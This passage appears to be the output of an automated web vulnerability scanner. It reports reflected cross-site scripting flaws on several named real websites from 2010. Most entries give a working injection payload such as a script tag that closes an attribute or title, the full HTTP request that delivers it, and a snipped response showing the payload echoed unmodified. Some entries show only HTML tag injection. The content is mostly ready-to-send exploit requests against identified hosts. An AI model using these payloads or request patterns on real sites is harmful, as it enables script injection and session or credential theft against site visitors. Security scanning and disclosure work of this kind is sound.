GET /news41e46<a>0d6dc089cc4/2007/08/20/drugs-bought-online-are-dangerous-says-research.asp HTTP/1.1 Host: www.pharmaceutical-int.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92dc7"><script>alert(1)</script>b920bc25a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news92dc7"><script>alert(1)</script>b920bc25a6/2007/08/20/drugs-bought-online-are-dangerous-says-research.asp HTTP/1.1 Host: www.pharmaceutical-int.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f48b2"-alert(1)-"44d66e31e4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articlesf48b2"-alert(1)-"44d66e31e4c/2009/137.html HTTP/1.1 Host: www.pharmamanufacturing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: SESS7e775296d3b39516864627b9a59fa702=b016a27b69b238a00f2c0691a6b4540c; expires=Mon, 03-Jan-2011 05:40:57 GMT; path=/; domain=.pharmamanufacturing.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:07:37 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 22319 Date: Sat, 11 Dec 2010 02:07:37 GMT X-Varnish: 423853120 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"> <head> <title>Ooops. The page you requested was not found.</title>
<base h ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */
if(typeof(window.put_registered) != "undefined"){ // defensive against variable not declared if(put_registered) { // fire a successful regis ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82c9f"-alert(1)-"c7e4ef4fa35 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/200982c9f"-alert(1)-"c7e4ef4fa35/137.html HTTP/1.1 Host: www.pharmamanufacturing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: SESS7e775296d3b39516864627b9a59fa702=9b45826609a87f6f25baf2f4dbed7d5a; expires=Mon, 03-Jan-2011 05:40:59 GMT; path=/; domain=.pharmamanufacturing.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:07:39 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 22319 Date: Sat, 11 Dec 2010 02:07:39 GMT X-Varnish: 983919490 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"> <head> <title>Ooops. The page you requested was not found.</title>
<base h ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */
if(typeof(window.put_registered) != "undefined"){ // defensive against variable not declared if(put_registered) { // fire a successful registrati ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fda80"-alert(1)-"054ade3f34a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/2009/137.htmlfda80"-alert(1)-"054ade3f34a HTTP/1.1 Host: www.pharmamanufacturing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: SESS7e775296d3b39516864627b9a59fa702=81f8f9a026bd3c43c2d0587a9653a84f; expires=Mon, 03-Jan-2011 05:41:01 GMT; path=/; domain=.pharmamanufacturing.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:07:41 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 22319 Date: Sat, 11 Dec 2010 02:07:42 GMT X-Varnish: 983919499 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"> <head> <title>Ooops. The page you requested was not found.</title>
<base h ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */
if(typeof(window.put_registered) != "undefined"){ // defensive against variable not declared if(put_registered) { // fire a successful registration event ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14da9<script>alert(1)</script>e6e8a23791f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic14da9<script>alert(1)</script>e6e8a23791f/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html HTTP/1.1 Host: www.publishersweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic14da9<script>alert(1)</script>e6e8a23791f/digital/copyright/article/43626-googl ...[SNIP]... </HEAD> layout for /by-topic14da9<script>alert(1)</script>e6e8a23791f/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html was not found
<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 5950b</title><script>alert(1)</script>b4f590d780d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic5950b</title><script>alert(1)</script>b4f590d780d/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html HTTP/1.1 Host: www.publishersweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic5950b</title><script>alert(1)</script>b4f590d780d/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html</TITLE> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 3f04a</title><script>alert(1)</script>db8b56b22e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic/digital/copyright/article3f04a</title><script>alert(1)</script>db8b56b22e2/43626-google-defeats-viacom-s-1-billion-youtube-suit.html HTTP/1.1 Host: www.publishersweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic/digital/copyright/article3f04a</title><script>alert(1)</script>db8b56b22e2/43626-google-defeats-viacom-s-1-billion-youtube-suit.html</TITLE> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 79453<script>alert(1)</script>d1d8fecb99b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic/digital/copyright/article79453<script>alert(1)</script>d1d8fecb99b/43626-google-defeats-viacom-s-1-billion-youtube-suit.html HTTP/1.1 Host: www.publishersweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic/digital/copyright/article79453<script>alert(1)</script>d1d8fecb99b/43626-googl ...[SNIP]... </HEAD> layout for /by-topic/digital/copyright/article79453<script>alert(1)</script>d1d8fecb99b/43626-google-defeats-viacom-s-1-billion-youtube-suit.html was not found
<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. --> ...[SNIP]...
The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload fd3c8</title><script>alert(1)</script>da54391ca81 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.htmlfd3c8</title><script>alert(1)</script>da54391ca81 HTTP/1.1 Host: www.publishersweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.htmlfd3c8</title><script>alert(1)</script>da54391ca81</TITLE> ...[SNIP]...
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7aca3<script>alert(1)</script>9fb72181375 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html7aca3<script>alert(1)</script>9fb72181375 HTTP/1.1 Host: www.publishersweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit ...[SNIP]... </HEAD> layout for /by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html7aca3<script>alert(1)</script>9fb72181375 was not found
<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. --> ...[SNIP]...
1.181. http://www.redherring.com/Home/22604 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.redherring.com
Path:
/Home/22604
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4367"><script>alert(1)</script>89c28973b19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Home/22604?d4367"><script>alert(1)</script>89c28973b19=1 HTTP/1.1 Host: www.redherring.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 02:07:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: BTX_CLN=D68D15C044067578C7B42F1C778BF2C5D50B2445039D825A9E972B206B1CAD70BEBADE92FD0A07C1015814A4FD17A763E83A3B39AB66FA9A02B8EBBA8CC1FB4F45AC1E04949204B925EF8361E44D7CA7DDF4843C51F1DDFA06B440F3C795ACB056B54808D7B4A87384A3B22158804441CDAE06C5; path=/; HttpOnly Set-Cookie: ASP.NET_SessionId=edshcbatctgo3p2cjxrkwhj4; path=/; HttpOnly Cache-Control: private Expires: Sat, 11 Dec 2010 02:06:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 56073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_headControl" ...[SNIP]... <form name="aspnetForm" method="post" action="/Home/22604?d4367"><script>alert(1)</script>89c28973b19=1" id="aspnetForm"> ...[SNIP]...
1.182. http://www.registration123.com/ICANN/GTLD/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.registration123.com
Path:
/ICANN/GTLD/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bac3"><script>alert(1)</script>8dadc6e7213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ICANN/GTLD/?2bac3"><script>alert(1)</script>8dadc6e7213=1 HTTP/1.1 Host: www.registration123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 02:07:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=2197325;expires=Mon, 03-Dec-2040 02:07:48 GMT;path=/ Set-Cookie: CFTOKEN=38966683;expires=Mon, 03-Dec-2040 02:07:48 GMT;path=/ Set-Cookie: CFID=2197325;path=/ Set-Cookie: CFTOKEN=38966683;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D2197325%26CFTOKEN%23%3D38966683%23lastvisit%3D%7Bts%20%272010%2D12%2D10%2021%3A07%3A48%27%7D%23timecreated%3D%7Bts%20%272010%2D12%2D10%2021%3A07%3A48%27%7D%23hitcount%3D2%23cftoken%3D38966683%23cfid%3D2197325%23;expires=Mon, 03-Dec-2040 02:07:48 GMT;path=/ Content-Language: en-US Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title> gTLD Program Global Consultation and Outreach Events</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 875f1"><a>44604211b0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Policies875f1"><a>44604211b0d HTTP/1.1 Host: www.registry.in Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:08:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: SESS10880b2ef3f6403b3d3155e84a6e14dd=q44oj0na5vkku33djrttclcas3; expires=Mon, 03-Jan-2011 05:41:32 GMT; path=/; domain=.registry.in Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:08:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Length: 5125 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equi ...[SNIP]... <body id="page-Policies875f1"><a>44604211b0d" class="section-Policies875f1"> ...[SNIP]...
1.184. http://www.tcbreview.com/is-it-the-real-thing.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tcbreview.com
Path:
/is-it-the-real-thing.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b781"><script>alert(1)</script>1b4cbd1ce9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /is-it-the-real-thing.php?4b781"><script>alert(1)</script>1b4cbd1ce9d=1 HTTP/1.1 Host: www.tcbreview.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:36 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 Connection: close Content-Type: text/html Content-Length: 44178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 179a2"><script>alert(1)</script>f465589a1ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs-and-stories179a2"><script>alert(1)</script>f465589a1ad/2009-10-05/swine-flu-swindle/ HTTP/1.1 Host: www.thedailybeast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Type: text/html; charset=UTF-8 Date: Sat, 11 Dec 2010 02:06:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 62115
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories179a2"><script>alert(1)</script>f465589a1ad/2009-10-05/swine-flu-swindle/full/"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f9b"><script>alert(1)</script>5e83f8ac653 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs-and-stories/2009-10-0566f9b"><script>alert(1)</script>5e83f8ac653/swine-flu-swindle/ HTTP/1.1 Host: www.thedailybeast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Type: text/html; charset=UTF-8 Date: Sat, 11 Dec 2010 02:06:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 62888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2009-10-0566f9b"><script>alert(1)</script>5e83f8ac653/swine-flu-swindle/full/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 16a82--><a>415270452a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /article.php16a82--><a>415270452a8/200913/3278/APWG-releases-Phishing-report-for-second-half-of-2008 HTTP/1.1 Host: www.thetechherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:06:38 GMT Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/4.4.4 Connection: close Content-Type: text/html Content-Length: 11304
<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"--> <html xmlns="http://www.w3.org/1999/xhtml" xm ...[SNIP]... <!--article.php16a82--><a>415270452a8--> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fc6b5--><a>5a135f84d92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /article.phpfc6b5--><a>5a135f84d92/201002/5069/Baidu-defaced-by-ICA-after-DNS-hijacking HTTP/1.1 Host: www.thetechherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:06:38 GMT Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/4.4.4 Connection: close Content-Type: text/html Content-Length: 11304
<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"--> <html xmlns="http://www.w3.org/1999/xhtml" xm ...[SNIP]... <!--article.phpfc6b5--><a>5a135f84d92--> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0de2"><a>fc229b7dbd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /marketwatchf0de2"><a>fc229b7dbd1/022708_MarkMonitor_Shares_Report_Results.cfm HTTP/1.1 Host: www.thewhir.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:01:29 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 32643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 881f4"><a>43fd5b886b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /marketwatch881f4"><a>43fd5b886b0/081908_ICANN_to_Hold_Auctions_for_Disputes.cfm HTTP/1.1 Host: www.thewhir.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:01:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 32643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7722d"><a>3fe5e8a82d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /marketwatch7722d"><a>3fe5e8a82d3/102008_MarkMonitor_Advises_on_New_TLDs.cfm HTTP/1.1 Host: www.thewhir.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:01:30 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 32643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ec5"><a>252879ec725 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /web-hosting-newsb7ec5"><a>252879ec725/040309_Q&A:_Te_Smith,_MarkMonitor HTTP/1.1 Host: www.thewhir.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:01:06 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 32648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 699e0"><a>fbd6b3f4020 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /web-hosting-news699e0"><a>fbd6b3f4020/092809_Phishing_at_a_Two_Year_High_MarkMonitor HTTP/1.1 Host: www.thewhir.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:01:11 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 32648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
1.194. http://www.thnic.net/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thnic.net
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44ae9'><script>alert(1)</script>9db8ec12eb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?44ae9'><script>alert(1)</script>9db8ec12eb3=1 HTTP/1.1 Host: www.thnic.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
